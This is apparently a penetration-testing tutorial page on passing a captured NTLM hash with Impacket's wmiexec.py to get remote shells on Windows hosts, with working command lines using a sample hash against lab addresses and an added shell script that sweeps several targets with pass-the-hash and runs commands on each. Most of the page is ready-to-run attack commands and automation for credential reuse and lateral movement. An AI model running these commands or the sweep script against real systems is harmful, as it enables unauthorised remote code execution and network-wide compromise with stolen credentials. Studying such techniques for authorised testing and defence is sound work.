Pass The Hash with wmiexec.py

Download wmiexec.py

Now that we have cracked our captured Net-NTLM challenge-response and derived the local Administrator's NTLM (NT) hash from it (a Net-NTLM hash itself cannot be passed; only the NT hash can), we can pass that hash to get a shell on the machine. There are 3 main methods I have used to significant effect; this page covers wmiexec:

wmiexec.py is another Impacket remote-execution script. It runs commands through WMI (Win32_Process.Create over DCOM/RPC) instead of installing a service the way smbexec and psexec do, so it leaves fewer artefacts and can get past AV that catches smbexec. Command output is read back from the ADMIN$ share over SMB, so the account needs local admin rights and port 445 reachable (unless you run it with -nooutput).

wget https://raw.githubusercontent.com/fortra/impacket/master/examples/wmiexec.py

Pass the Hash

We use the NT hash recovered above, or one dumped with lsassy, DonPAPI, or a SAM dump. The whoami, ipconfig and hostname lines below are typed at the semi-interactive shell that wmiexec.py opens once authentication succeeds.

wmiexec.py -hashes '00000000000000000000000000000000:dbd13e1c4e338284ac4e9874f7de6ef4' administrator@192.168.56.22
whoami
ipconfig
hostname

wmiexec.py -hashes '00000000000000000000000000000000:dbd13e1c4e338284ac4e9874f7de6ef4' administrator@192.168.56.11
whoami
ipconfig
hostname

Note: the -hashes value is LMHASH:NTHASH. The LM half is not used for NTLM authentication, so you can fill it with 32 zeros (as above), use the "empty" LM hash aad3b435b51404eeaad3b435b51404ee, or leave it blank (-hashes :dbd13e1c4e338284ac4e9874f7de6ef4). Passing the NT hash alone without the colon will not work.
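The same procedure as a small sweep script, added here as an example and not part of the original page or of Impacket itself. It normalises whatever hash you were handed (bare NT, LM:NT, or :NT) into the LMHASH:NTHASH form the -hashes flag needs, refuses anything that is not 32 hex characters, and then runs one non-interactive command on each target so the output stays tagged per host. It assumes wmiexec.py is on PATH (pip install impacket provides it; the wget'd copy needs to be invoked as python3 wmiexec.py, which you can set via the WMIEXEC variable). The username, hash and target addresses are the sample values from this page.

```shell
#!/bin/sh
# Added example (not from the original page or Impacket): pass-the-hash
# sweep with wmiexec.py. WMIEXEC lets you point at a local copy, e.g.
#   WMIEXEC="python3 ./wmiexec.py" ./pth-sweep.sh --run
set -eu

WMIEXEC="${WMIEXEC:-wmiexec.py}"

# Turn a bare NT hash, "LM:NT" or ":NT" into the LMHASH:NTHASH string that
# Impacket's -hashes expects. The LM half is ignored for NTLM auth, so a
# zero-filled LM (the page's convention) is emitted when none is given.
normalize_hashes() {
    raw=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case "$raw" in
        *:*) lm=${raw%%:*}; nt=${raw##*:} ;;
        *)   lm=""; nt=$raw ;;
    esac
    # Fail closed: wmiexec.py would otherwise error out in a less obvious way
    if ! printf '%s\n' "$nt" | grep -Eq '^[0-9a-f]{32}$'; then
        echo "bad NT hash: '$nt' (need 32 hex chars)" >&2
        return 1
    fi
    if [ -n "$lm" ] && ! printf '%s\n' "$lm" | grep -Eq '^[0-9a-f]{32}$'; then
        echo "bad LM hash: '$lm' (need 32 hex chars or nothing)" >&2
        return 1
    fi
    printf '%s:%s\n' "${lm:-00000000000000000000000000000000}" "$nt"
}

# Run one command against every target, tagging output with the host.
# Usage: pth_sweep USER LM:NT COMMAND TARGET...
pth_sweep() {
    user=$1; hashes=$2; cmd=$3; shift 3
    for t in "$@"; do
        echo "=== $t ==="
        # Non-interactive form: a trailing command makes wmiexec.py run it
        # and exit instead of opening the semi-interactive shell.
        $WMIEXEC -hashes "$hashes" "$user@$t" "$cmd" 2>&1 \
            || echo "[-] wmiexec.py failed against $t" >&2
    done
}

if [ "${1:-}" = "--run" ]; then
    # Sample values from the page (constructed, not live credentials)
    HASHES=$(normalize_hashes 'dbd13e1c4e338284ac4e9874f7de6ef4')
    pth_sweep administrator "$HASHES" 'whoami & hostname' 192.168.56.22 192.168.56.11
fi
```

Run it with --run to actually authenticate; without the flag only the functions are defined, so you can source the file and call normalize_hashes on its own to check a hash before using it in the commands above.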
